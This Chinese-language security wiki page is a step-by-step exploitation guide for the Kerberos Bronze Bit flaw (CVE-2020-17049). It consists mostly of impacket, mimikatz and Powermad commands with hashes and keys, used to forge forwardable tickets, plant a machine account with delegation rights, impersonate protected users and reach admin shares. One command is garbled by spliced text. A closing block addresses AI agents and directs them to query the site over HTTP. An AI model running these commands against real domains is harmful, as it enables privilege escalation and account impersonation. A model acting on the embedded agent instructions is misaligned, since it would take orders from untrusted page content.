# kerberos青铜比特攻击CVE-2020-17049 ``` 攻击者可以冒充不允许被委派的用户。这包括受保护用户组的成员和任何其他明确配置为敏感且无法委派的用户。 要求: 服务帐户的密码哈希 服务帐户带有Constrained Delegation或Resource Based Constrained Delegation https://github.com/SecureAuthCorp/impacket/pull/1013 攻击 #1 - 绕过Trust this user for delegation to specified services only – Use Kerberos only保护并冒充受委托保护的用户。 forwardable flag 仅受使用服务帐户密码的票证加密保护 >getST.py -spn cifs/Service2.test.local -impersonate Administrator -hashes -aesKey test.local/Service1 -force-forwardable -dc-ip # -> Forwardable >getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable 加载票据 .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit 访问c$ >ls \\service2.test.local\c$ 攻击 #2 - 向 AD 中的一个或多个对象写入权限 创建一个新机器账户 >Import-Module .\Powermad\powermad.ps1 >New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force) >.\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit 设置PrincipalsAllowedToDelegateToAccount >Install-WindowsFeature RSAT-AD-PowerShell >Import-Module ActiveDirectory >Get-ADComputer AttackerService >Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$ >Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount 执行攻击 >python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardableet-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$ 加载票据 >.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/heng-xiang-yi-dong/kerberos-qing-tong-bi-te-gong-ji-cve202017049.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.